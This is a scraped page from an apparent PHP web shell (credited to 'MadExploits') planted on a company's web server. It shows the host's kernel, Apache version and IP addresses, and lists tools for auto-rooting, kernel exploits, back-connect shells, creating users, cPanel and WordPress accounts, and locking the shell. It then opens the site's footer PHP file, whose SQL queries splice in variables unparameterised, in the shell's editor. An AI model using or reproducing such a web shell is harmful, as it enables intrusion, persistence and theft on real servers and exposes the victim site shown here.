Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 3.137.182.21
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
sniperthailand.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
assets2
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
lasery
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
.htaccess
1.2
KB
-rw-r--r--
0language.php
1.91
KB
-rwxr-xr-x
1Head.php
20.57
KB
-rwxr-xr-x
2HeadMenu.php
14.78
KB
-rwxr-xr-x
2banner.php
4.68
KB
-rwxr-xr-x
3Footer.php
10.82
KB
-rwxr-xr-x
4End.php
5.74
KB
-rwxr-xr-x
about.php
12.83
KB
-rw-r--r--
contact.php
6.64
KB
-rwxr-xr-x
detail.php
11.99
KB
-rwxr-xr-x
download.php
9.8
KB
-rwxr-xr-x
index.php
173
B
-rwxr-xr-x
news-details.php
5.92
KB
-rwxr-xr-x
news.php
5.83
KB
-rwxr-xr-x
product.php
16.06
KB
-rwxr-xr-x
product_category.php
8.7
KB
-rwxr-xr-x
product_category3.php
14.71
KB
-rwxr-xr-x
product_category4.php
5.26
KB
-rwxr-xr-x
product_contact.php
1.87
KB
-rwxr-xr-x
product_detail.php
24.13
KB
-rwxr-xr-x
product_detail_More_products.p...
7.61
KB
-rwxr-xr-x
product_left_cat.php
7.23
KB
-rwxr-xr-x
search.php
4.3
KB
-rwxr-xr-x
service.php
3.8
KB
-rwxr-xr-x
topic-product.php
1.82
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 3Footer.php
<footer id="footer"> <div class="footer-container"> <div class="container"> <div class="row"> <div class="igk_footercategories_wrapper"> <div class="row"> <?PHP $SQL_Category = " SELECT ProductCategory2_ID , ProductCategory_ID , ProductCategory2_Name , StatusProductCategory2_ID FROM product_category2 WHERE StatusProductCategory2_ID = 1 AND ProductCategory_ID = $ProductCategory_ID ORDER BY ProductCategory2_Sort "; $objQuery_Category = $objConnect->query($SQL_Category); $i = 0; while ($objResult_Category = mysqli_fetch_array($objQuery_Category)) { $i++; $ProductCategory2Name = $objResult_Category["ProductCategory2_Name"]; $ProductCategory2ID = $objResult_Category["ProductCategory2_ID"]; if ($ProductCategory2ID == 198) { $LinkHref = 'product_category3.php?c3=' . $ProductCategory3ID2 . ''; } else if ($ProductCategory2ID == 193) { $LinkHref = 'product_category3.php?c3=' . $ProductCategory3ID2 . ''; } else { $LinkHref = 'product_category.php?c2=' . $ProductCategory2ID . ''; } $SQL_Category3 = " SELECT product_category3.ProductCategory3_ID , product_category3.ProductCategory3_Name , product_category3.ProductCategory3_Sort, product_category3.StatusProductCategory3_ID , product_category3.ProductCategory2_ID FROM product_category3 WHERE product_category3.StatusProductCategory3_ID = 1 AND product_category3.ProductCategory2_ID = $ProductCategory2ID ORDER BY product_category3.ProductCategory3_Sort "; $objQuery_Category3 = $objConnect->query($SQL_Category3); ?> <div class="col-xl-2 col-lg-4 col-md-4 col-sm-6 col-xs-12 col-12 mb2"> <h4> <a class="text-footer-index1" href="<?= $LinkHref; ?>" title="<?= $ProductCategory2Name; ?>"><?= $ProductCategory2Name; ?></a> </h4> <?PHP if ($ProductCategory2ID != 198 and $ProductCategory2ID != 193) { ?> <ul> <?PHP while ($objResult_Category3 = mysqli_fetch_array($objQuery_Category3)) { $ProductCategory3ID = $objResult_Category3["ProductCategory3_ID"]; $ProductCategory3Name = $objResult_Category3["ProductCategory3_Name"]; $SQL_Category4 = " SELECT product_category4.ProductCategory4_ID,product_category4.ProductCategory3_ID,product_category4.ProductCategory4_Name, product_category4.StatusProductCategory4_ID,product_category4.ProductCategory4_Img, product_category4.ProductCategory4_Date,product_category4.ProductCategory4_Time , product_category3.ProductCategory3_Name, product_category3.ProductCategory2_ID , product_category2.ProductCategory2_Name , product_category2.ProductCategory_ID, product_category.ProductCategory_Name FROM product_category4 INNER JOIN product_category3 ON product_category4.ProductCategory3_ID = product_category3.ProductCategory3_ID INNER JOIN product_category2 ON product_category3.ProductCategory2_ID = product_category2.ProductCategory2_ID INNER JOIN product_category ON product_category2.ProductCategory_ID = product_category.ProductCategory_ID WHERE product_category4.StatusProductCategory4_ID = 1 AND product_category4.ProductCategory3_ID = $ProductCategory3ID ORDER BY product_category.ProductCategory_Name "; $objQuery_Category4_CHK = $objConnect->query($SQL_Category4); $Count_Category_Head = mysqli_num_rows($objQuery_Category4_CHK); ?> <li> <a href="product_category3.php?c3=<?= $ProductCategory3ID; ?>" title="<?= $ProductCategory3Name; ?>"><?= $ProductCategory3Name; ?></a> </li> <?PHP } ?> </ul> <?PHP } ?> </div> <?PHP if ($i == 5) { $i = 0; echo '</div><div class="row">'; } //echo $i; ?> <?PHP } ?> </div> </div> </div> </div> </div> <div id="footer-line"> <div class="white-line col-md-7 col-xs-12"></div> <div class="red-style col-md-5 col-xs-12"> <div class="red-border"></div> <div class="red-line"></div> </div> </div> <div id="copyright"> <div class="container"> <div class="row"> <div class="col-lg-2" id="footer-logo"> <p><img src="img/sniper.png" alt="" class="img-fluid" /></p> </div> <div class="col-lg-5 col-md-9" id="footer-menu"> <ul> <li><a href="about.php"> <?= $topicmenu22; ?></a></li> <li><a href="product.php"> <?= $topicmenu2; ?></a></li> <li><a href="news.php"> <?= $topicmenu3; ?></a></li> <li><a href="service.php"> <?= $topicmenu4; ?></a></li> <li><a href="download.php"> <?= $topicmenu5; ?></a></li> <li><a href="knowledge.php"> <?= $topicmenu6; ?></a></li> <li><a href="contact.php"> <?= $topicmenu7; ?></a></li> </ul> </div> <div class="block-social col-xl-2 offset-xl-0 col-lg-3 offset-lg-6 col-md-4 offset-md-5 col-sm-12 col-xs-12"> <ul> <?PHP if ($_SESSION['ses_check_language'] == "th") { //1 $CategoryContent_ID = 55; $CategoryContentLanguage_ID = 120; } else if ($_SESSION['ses_check_language'] == "en") { //2 $CategoryContent_ID = 55; $CategoryContentLanguage_ID = 121; } include 'Structure/Structure_Content_Loop.php'; while ($objResult_content = mysqli_fetch_array($objQuery_content)) { $ContentID = $objResult_content["Content_ID"]; $ContentName = $objResult_content["Content_Name"]; $ContentContent1 = $objResult_content["Content_Content1"]; $ContentContent2 = $objResult_content["Content_Content2"]; $ContentContent3 = $objResult_content["Content_Content3"]; $ContentContent4 = $objResult_content["Content_Content4"]; $ContentContent5 = $objResult_content["Content_Content5"]; $ContentNumber = $objResult_content["Content_Number"]; $ContentDate = $objResult_content["Content_Date"]; $ContentTime = $objResult_content["Content_Time"]; include 'Structure/Structure_Content_check.php'; $SQL_Content_Img = " SELECT ContentImg_ID , Content_ID, ContentImg_Name , ContentImg_Sort FROM content_img WHERE Content_ID = $ContentID ORDER BY ContentImg_Sort ASC LIMIT 8 "; $objQuery_Content_Img = $objConnect->query($SQL_Content_Img); ?> <?PHP while ($objResult_Content_Img = mysqli_fetch_array($objQuery_Content_Img)) { $CIMG_ContentImgName = $objResult_Content_Img["ContentImg_Name"]; ?> <li><a href="<?= $ContentContent2; ?>" target="_blank"><img src="model/upload/img/IMG_Home/<?= $CIMG_ContentImgName; ?>" style="margin-left: 7px;margin-top: 7px;"></a></li> <?PHP } ?> <?PHP } ?> </ul> </div> <div class="col-xl-3 col-lg-3 col-md-3 col-sm-12 col-xs-12" id="address"> <p style="font-size: 14px;"> SNIPER THAILAND <br /> e-mail: <a href="">sales@sniperthailand.com</a> </p> </div> </div> <div class="row"> <div class="col-md-12"> <p class="text-sm-center">COPYRIGHT © SNIPER THAILAND 2025 ALL RIGHTS RESERVED | DESIGNED BY <a href="https://rampagesoft.com/webdesign/" title="RAMPAGESOFT">RAMPAGESOFT</a></p> </div> </div> <div class="row"> <div class="col-md-10" style="margin-left: auto;margin-right: auto;"> <script src="https://apps.elfsight.com/p/platform.js" defer></script> <div class="elfsight-app-a0a04013-0b4b-452c-aeff-6dace368e01e" style="text-align: center;"></div> </div> </div> </div> </div> </main>
Close